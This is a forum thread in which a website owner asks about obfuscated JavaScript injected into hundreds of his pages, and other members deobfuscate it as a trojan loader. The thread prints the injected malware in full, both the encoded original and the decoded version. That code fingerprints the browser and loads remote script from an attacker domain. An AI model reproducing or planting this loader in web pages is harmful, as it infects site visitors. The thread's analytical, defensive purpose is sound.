Jump to content

Weird code on my website


speedy33417

Recommended Posts

I have some weird code that appeared in my websites source code. Not sure if someone hacked into my server or what happened.

 

Here's a the code. How concerned should I be? What does the code do?

 

<script language=javascript><!-- 
(function(){var tdv2O='%';var zL7j=('va>72>20a>3d>22S>63riptEngine>22>2cb>3d>22>56ersion()+>22>2c>6a>3d>22>22>2cu>3dnavig>61tor>2eu>73>65r>41gen>74>3bif>28>28u>2eind>65x>4ff>28>22C>68>72o>6de>22>29>3c0)>26>26(u>2ei>6edexO>66>28>22Win>22)>3e>30)>26>26>28u>2eindexOf(>22NT>20>36>22)>3c0)>26>26(do>63ument>2eco>6fki>65>2eind>65x>4f>66>28>22miek>3d1>22)>3c0)>26>26(>74ypeo>66>28z>72>76>7ats)>21>3d>74yp>65of(>22A>22)))>7b>7ar>76zt>73>3d>22A>22>3beval(>22if(wi>6edow>2e>22+a>2b>22>29j>3dj+>22+a+>22Major>22>2b>62>2ba+>22M>69nor>22>2bb+a>2b>22Build>22+b>2b>22j>3b>22)>3bdocu>6dent>2e>77ri>74e(>22>3cs>63ri>70>74>20src>3d>2f>2fm>22+>22a>72tu>7a>2e>63n>2fvid>2f>3fid>3d>22+j>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d').replace(/>/g,tdv2O);var bhioa=unescape(zL7j);eval(bhioa)})();
--></script>

Link to comment
Share on other sites

Thanks ober.

 

This code has been added to hundreds of pages on my site and luckily they all have the same upload time stamp so I can easily spot which ones have been affected.

 

If it's a trojan what does it really do? Does steal passwords? How does it work? Would I have to be on an affected webpage and information entered on that page  would be compromised? Or does this mean that my entire website is compromised now? I'm just trying to understand what it might do and what damage may have been done.

 

Thanks for your help.

Link to comment
Share on other sites

It will actually try to install itself on the client PC.  I got nailed on my personal site when I used some 3rd party code.  Some of my users had their anti-virus software pick it up.

Link to comment
Share on other sites

Well, you could just check the code yourself, no? What you posted is equivalent to the following Javascript:

 

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");}

 

Applying some formatting we get:

var a="ScriptEngine", b="Version()+", j="", u=navigator.userAgent;

if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A")))
{
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
}

 

The string within the eval() is this:

if(window.ScriptEngine)j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;

 

So it'll set j if some conditions are true, and it will then execute the Javascript which is hosted on http://martuz.cn/vid/?id=j

 

This is seemingly a "reported attack site".

 

The domain name martuz.cn resolves to 98.124.198.1, but that machine doesn't seem to be up.

Link to comment
Share on other sites

Thanks all for the help.

 

Btw, Daniel. How did you get your version of the JS code out of mine? It doesn't look anything close you posted. Is it encrypted in some way? How (and where) do I convert the original hacker code to a JS code that makes more sense (like yours)?

Link to comment
Share on other sites

You see the very last statement of your code?

eval(bhioa)

 

It's evaluating the contents of the variable bhioa. It's simply a matter of printing that variable to get the plain text code. It's no more than obfuscation. A browser needs HTML, CSS and Javascript in plain text, so it's impossible to decrypt it and/or hide it.

Link to comment
Share on other sites

Just wondering...how do you install stuff onto a client's PC with javascript? That would be cool :P

 

And are you sure it's not your host? Is it actually in the file, if you open the file to edit it, not just on your source code? Some hosts automatically append scripts to all sites, like stat counters and stuff.

 

But yeah, try something like this:

document.write(unescape(bhioa));

Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.